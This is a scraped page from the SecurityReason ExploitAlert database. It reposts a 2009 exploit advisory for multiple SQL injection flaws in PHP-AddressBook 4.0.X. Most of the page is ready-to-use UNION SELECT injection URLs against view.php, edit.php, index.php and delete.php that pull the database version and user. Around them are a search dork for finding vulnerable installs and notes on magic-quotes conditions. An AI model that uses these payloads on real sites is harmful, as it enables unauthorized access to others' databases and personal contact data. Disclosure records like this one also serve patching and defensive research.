|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 6479 SecurityAlert : 6125 (Exploit Details) Milw0rm ID : 9023 Credit : YEnH4ckEr Date : 27.06.2009 Exploit Code : --------------------------------------------------------------------------- ------------------- | MULTIPLE SQL INJECTION VULNERABILITIES | |-------------------------------------------------------------------------- ------------------| | | PHP-AddressBook v-4.0.X | | | CMS INFORMATION: ---------------------------------- | | | |-->WEB: http://sourceforge.net/projects/php-addressbook/ | |-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/ | |-->DEMO: http://php-addressbook.sourceforge.net/demo/ | |-->CATEGORY: Address Book | |-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer. | | Manage groups, addresses, e-Mails, phone numbers & birthdays... | |-->RELEASED: 2009-06-13 | | | | CMS VULNERABILITY: | | | |-->TESTED ON: firefox 3 | |-->DORK: "php-addressbook" | |-->CATEGORY: SQL INJECTION | |-->AFFECT VERSION: 4.0.X | |-->Discovered Bug date: 2009-06-16 | |-->Reported Bug date: 2009-06-16 | |-->Fixed bug date: N/A | |-->Info patch (????): N/A | |-->Author: YEnH4ckEr | |-->mail: y3nh4ck3r[at]gmail[dot]com | |-->WEB/BLOG: N/A | |-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | |-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | --------------------------------------------------------------------------- ------------------- Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest). ##################### //////////////////// SQL INJECTION VULN: //////////////////// #################### ----------- EXPLOITS: ----------- <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4 ,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user( ),4,5,6,7,8,9,10,11,12,13,14%23 [++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user (),4,5,6,7,8,9,10,11,12,13,14%23 <<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>> [++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user (),4,5,6,7,8,9,10,11,12,13,14%23 ------------- WATCH VIDEO: ------------- SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |